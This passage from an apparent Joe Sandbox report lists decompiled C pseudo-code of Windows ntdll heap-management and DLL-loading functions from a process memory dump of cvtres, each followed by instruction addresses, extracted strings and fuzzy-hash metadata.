							_t75 = E055AB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E056614FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E055C7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E05661411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E055C7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E05661411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                        0x055dac85
                                                                        0x055dac88
                                                                        0x055dac8a
                                                                        0x055dac8d
                                                                        0x055dac91
                                                                        0x055dac99
                                                                        0x055dac9c
                                                                        0x05619f57
                                                                        0x05619f5b
                                                                        0x05619f60
                                                                        0x05619f60
                                                                        0x055daca8
                                                                        0x055dacae
                                                                        0x055dacda
                                                                        0x055dacde
                                                                        0x055dace8
                                                                        0x055daceb
                                                                        0x055dacee
                                                                        0x00000000
                                                                        0x055dacee
                                                                        0x055dacf6
                                                                        0x055dacb0
                                                                        0x055dacb0
                                                                        0x055dacbb
                                                                        0x055dacbd
                                                                        0x055dacc0
                                                                        0x055dacc5
                                                                        0x055dadae
                                                                        0x055dadb4
                                                                        0x055dadb4
                                                                        0x055dacd4
                                                                        0x055dacd8
                                                                        0x055dacf9
                                                                        0x055dacff
                                                                        0x055dad04
                                                                        0x055dad08
                                                                        0x055dad09
                                                                        0x055dad10
                                                                        0x055dad12
                                                                        0x055dad18
                                                                        0x05619f6f
                                                                        0x05619f74
                                                                        0x05619f76
                                                                        0x05619f7c
                                                                        0x05619f84
                                                                        0x05619f88
                                                                        0x05619f89
                                                                        0x05619f90
                                                                        0x05619f90
                                                                        0x05619f76
                                                                        0x055dad1e
                                                                        0x055dad24
                                                                        0x055dad26
                                                                        0x0561a097
                                                                        0x0561a09b
                                                                        0x0561a0ba
                                                                        0x0561a0bf
                                                                        0x0561a09d
                                                                        0x0561a0b2
                                                                        0x0561a0b7
                                                                        0x0561a0c5
                                                                        0x0561a0c8
                                                                        0x0561a0cb
                                                                        0x0561a0d2
                                                                        0x00000000
                                                                        0x055dad2c
                                                                        0x055dad2c
                                                                        0x055dad2f
                                                                        0x055dad34
                                                                        0x055dad36
                                                                        0x05619f97
                                                                        0x05619f9a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05619fa9
                                                                        0x055dad3e
                                                                        0x055dad3e
                                                                        0x055dad41
                                                                        0x05619fb3
                                                                        0x05619fb9
                                                                        0x05619fc0
                                                                        0x05619fd0
                                                                        0x05619fd0
                                                                        0x05619fc0
                                                                        0x055dad4a
                                                                        0x055dad50
                                                                        0x055dad5c
                                                                        0x055dad62
                                                                        0x055dad68
                                                                        0x055dad6b
                                                                        0x055dad6d
                                                                        0x05619fda
                                                                        0x05619fdd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05619fec
                                                                        0x00000000
                                                                        0x055dad73
                                                                        0x055dad73
                                                                        0x055dad73
                                                                        0x055dad75
                                                                        0x055dad75
                                                                        0x055dad78
                                                                        0x05619ff6
                                                                        0x05619ffc
                                                                        0x0561a003
                                                                        0x0561a00e
                                                                        0x0561a010
                                                                        0x0561a01b
                                                                        0x0561a01b
                                                                        0x0561a01b
                                                                        0x0561a038
                                                                        0x0561a038
                                                                        0x0561a003
                                                                        0x055dad84
                                                                        0x055dad89
                                                                        0x055dad8c
                                                                        0x055dad8e
                                                                        0x0561a042
                                                                        0x0561a045
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561a054
                                                                        0x00000000
                                                                        0x055dad94
                                                                        0x055dad94
                                                                        0x055dad94
                                                                        0x055dad96
                                                                        0x055dad96
                                                                        0x055dad99
                                                                        0x0561a063
                                                                        0x0561a065
                                                                        0x0561a070
                                                                        0x0561a070
                                                                        0x0561a070
                                                                        0x0561a08d
                                                                        0x0561a08d
                                                                        0x055dada4
                                                                        0x055dada6
                                                                        0x00000000
                                                                        0x055dada6
                                                                        0x055dad8e
                                                                        0x055dad6d
                                                                        0x055dad3c
                                                                        0x055dad3c
                                                                        0x00000000
                                                                        0x055dad3c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055dacd8

                                                                        Strings
                                                                        • HEAP: , xrefs: 0561A0BA
                                                                        • HEAP[%wZ]: , xrefs: 0561A0AD
                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0561A0CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                        • API String ID: 0-1340214556
                                                                        • Opcode ID: d6efb40d0a51fc5c2a19f362c8a6bf460ae03e7d0293636927206e8ca35793ab
                                                                        • Instruction ID: 757b19f7098495418f1d620f699ff9da25ef4d73ea200dbae4a8fadcb125d9c4
                                                                        • Opcode Fuzzy Hash: d6efb40d0a51fc5c2a19f362c8a6bf460ae03e7d0293636927206e8ca35793ab
                                                                        • Instruction Fuzzy Hash: C4810532204684EFD726DBA8C894FBABBF8FF05314F0845A5E9428B791D774E940CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CB73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E055CB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0566A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x5698748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E055AB150();
					} else {
						E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E055AB150();
					__eflags =  *0x5697bc8;
					if(__eflags == 0) {
						E05662073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0566A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x5698720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x5698720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E055CB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0566A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E055CE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                        0x055cb746
                                                                        0x055cb74b
                                                                        0x055cb74d
                                                                        0x055cb750
                                                                        0x055cb755
                                                                        0x055cb758
                                                                        0x055cb758
                                                                        0x055cb75e
                                                                        0x055cb763
                                                                        0x055cb764
                                                                        0x055cb76a
                                                                        0x055cb76d
                                                                        0x055cb771
                                                                        0x055cb776
                                                                        0x055cb85c
                                                                        0x055cb85d
                                                                        0x055cb860
                                                                        0x055cb865
                                                                        0x05612ba1
                                                                        0x05612ba2
                                                                        0x05612ba9
                                                                        0x05612bae
                                                                        0x05612bae
                                                                        0x055cb77c
                                                                        0x055cb77c
                                                                        0x055cb77c
                                                                        0x055cb785
                                                                        0x055cb788
                                                                        0x05612bb6
                                                                        0x05612bb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05612bbf
                                                                        0x05612bc5
                                                                        0x05612bc9
                                                                        0x05612be8
                                                                        0x05612bed
                                                                        0x05612bcb
                                                                        0x05612be0
                                                                        0x05612be5
                                                                        0x05612bf3
                                                                        0x05612bf8
                                                                        0x05612bfd
                                                                        0x05612c05
                                                                        0x05612c0e
                                                                        0x05612c0e
                                                                        0x00000000
                                                                        0x055cb78e
                                                                        0x055cb78e
                                                                        0x055cb78e
                                                                        0x055cb791
                                                                        0x055cb791
                                                                        0x055cb797
                                                                        0x055cb797
                                                                        0x055cb79f
                                                                        0x055cb7a9
                                                                        0x055cb7af
                                                                        0x055cb7af
                                                                        0x055cb7b1
                                                                        0x055cb7b6
                                                                        0x055cb7e2
                                                                        0x055cb7e2
                                                                        0x055cb7e7
                                                                        0x055cb880
                                                                        0x055cb7ed
                                                                        0x055cb7ed
                                                                        0x055cb7ed
                                                                        0x055cb7ef
                                                                        0x055cb7f2
                                                                        0x055cb7f2
                                                                        0x055cb7f5
                                                                        0x055cb7fa
                                                                        0x05612c2d
                                                                        0x05612c2e
                                                                        0x05612c39
                                                                        0x055cb800
                                                                        0x055cb800
                                                                        0x055cb802
                                                                        0x055cb805
                                                                        0x055cb808
                                                                        0x055cb808
                                                                        0x055cb80a
                                                                        0x055cb80d
                                                                        0x055cb816
                                                                        0x055cb81c
                                                                        0x055cb822
                                                                        0x055cb82f
                                                                        0x055cb88b
                                                                        0x055cb892
                                                                        0x055cb897
                                                                        0x055cb899
                                                                        0x055cb89b
                                                                        0x055cb89e
                                                                        0x055cb8a5
                                                                        0x055cb8a8
                                                                        0x055cb8aa
                                                                        0x055cb8ac
                                                                        0x055cb8ac
                                                                        0x055cb8aa
                                                                        0x055cb892
                                                                        0x055cb831
                                                                        0x055cb839
                                                                        0x055cb83b
                                                                        0x055cb83b
                                                                        0x055cb844
                                                                        0x055cb84b
                                                                        0x055cb852
                                                                        0x055cb7b8
                                                                        0x055cb7ba
                                                                        0x055cb7bf
                                                                        0x055cb7c4
                                                                        0x05612c18
                                                                        0x05612c19
                                                                        0x05612c23
                                                                        0x055cb7ca
                                                                        0x055cb7ca
                                                                        0x055cb7cc
                                                                        0x055cb7cf
                                                                        0x055cb7d1
                                                                        0x055cb7d1
                                                                        0x055cb7d4
                                                                        0x055cb7dc
                                                                        0x055cb8bb
                                                                        0x055cb8bb
                                                                        0x055cb8be
                                                                        0x055cb8be
                                                                        0x055cb8c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055cb8c3
                                                                        0x055cb8c5
                                                                        0x055cb8c7
                                                                        0x055cb8e0
                                                                        0x00000000
                                                                        0x055cb8e0
                                                                        0x055cb8cc
                                                                        0x055cb8cc
                                                                        0x00000000
                                                                        0x055cb8cc
                                                                        0x055cb8d6
                                                                        0x055cb8d6
                                                                        0x00000000
                                                                        0x055cb7dc
                                                                        0x055cb7b6

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        • Opcode ID: c61a9ae7941a3e9a829393eb23daf6e6942b730705c0c7323fc74c7eecba88e6
                                                                        • Instruction ID: 93a58cf81264436d58877ab6e2e5dd3218f479557d75ad0973b4566644b2fa64
                                                                        • Opcode Fuzzy Hash: c61a9ae7941a3e9a829393eb23daf6e6942b730705c0c7323fc74c7eecba88e6
                                                                        • Instruction Fuzzy Hash: 2F61CE74600241DFDB18CF64C486B7ABFE6FF44324F5485AEE84A8B241D771E881CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055B7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E055B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E055BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E055AC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x5695780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E05625510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x5695780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E055C7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E055C7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E05627016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E055C7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E055C7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E05627016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E055DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E055AB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                        0x055b7e4c
                                                                        0x055b7e50
                                                                        0x055b7e55
                                                                        0x055b7e58
                                                                        0x055b7e5d
                                                                        0x055b7e71
                                                                        0x055b7f33
                                                                        0x055b7e77
                                                                        0x055b7e77
                                                                        0x055b7e79
                                                                        0x055b7e79
                                                                        0x055b7e7e
                                                                        0x055b7f45
                                                                        0x05609848
                                                                        0x00000000
                                                                        0x05609848
                                                                        0x055b7f4e
                                                                        0x055b7f53
                                                                        0x055b7f5a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560985a
                                                                        0x05609862
                                                                        0x05609866
                                                                        0x00000000
                                                                        0x0560986c
                                                                        0x00000000
                                                                        0x0560986c
                                                                        0x055b7e84
                                                                        0x055b7e84
                                                                        0x055b7e8d
                                                                        0x05609871
                                                                        0x055b7eb8
                                                                        0x055b7ec0
                                                                        0x055b7ec0
                                                                        0x055b7e9a
                                                                        0x0560987e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05609884
                                                                        0x0560988b
                                                                        0x056098a7
                                                                        0x056098ac
                                                                        0x056098b1
                                                                        0x056098b6
                                                                        0x056098b8
                                                                        0x056098b8
                                                                        0x056098b9
                                                                        0x00000000
                                                                        0x056098b9
                                                                        0x055b7ea0
                                                                        0x055b7ea7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b7eac
                                                                        0x055b7eb1
                                                                        0x055b7ec6
                                                                        0x055b7ed0
                                                                        0x056098cc
                                                                        0x055b7ed6
                                                                        0x055b7ed6
                                                                        0x055b7ed6
                                                                        0x055b7ede
                                                                        0x055b7ee3
                                                                        0x056098e3
                                                                        0x056098f0
                                                                        0x05609902
                                                                        0x056098f2
                                                                        0x056098fb
                                                                        0x056098fb
                                                                        0x05609907
                                                                        0x0560991d
                                                                        0x0560991d
                                                                        0x05609907
                                                                        0x056098e3
                                                                        0x055b7ef0
                                                                        0x055b7f14
                                                                        0x055b7f14
                                                                        0x055b7f1e
                                                                        0x05609946
                                                                        0x055b7f24
                                                                        0x055b7f24
                                                                        0x055b7f24
                                                                        0x055b7f2c
                                                                        0x0560996a
                                                                        0x05609975
                                                                        0x05609975
                                                                        0x0560997e
                                                                        0x05609993
                                                                        0x05609993
                                                                        0x0560997e
                                                                        0x00000000
                                                                        0x055b7ef2
                                                                        0x055b7efc
                                                                        0x055b7f0a
                                                                        0x055b7f0e
                                                                        0x05609933
                                                                        0x00000000
                                                                        0x05609933
                                                                        0x00000000
                                                                        0x055b7f0e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b7eb1

                                                                        Strings
                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 056098A2
                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 05609891
                                                                        • LdrpCompleteMapModule, xrefs: 05609898
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                        • API String ID: 0-1676968949
                                                                        • Opcode ID: f55879505b386752dccc086fb0a19cf4688d9c742eb6f48497aa12b64fe63197
                                                                        • Instruction ID: 05808262be61b5263dad598c6a3332fa7e2f1ae73e79e71b4aa77d9888d96c8c
                                                                        • Opcode Fuzzy Hash: f55879505b386752dccc086fb0a19cf4688d9c742eb6f48497aa12b64fe63197
                                                                        • Instruction Fuzzy Hash: 7B5107316147459FEB29CB68C888B7A77E6FF88310F040959E8529B7D1D7B1ED00CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 056523E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E056523E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x569874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x569874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
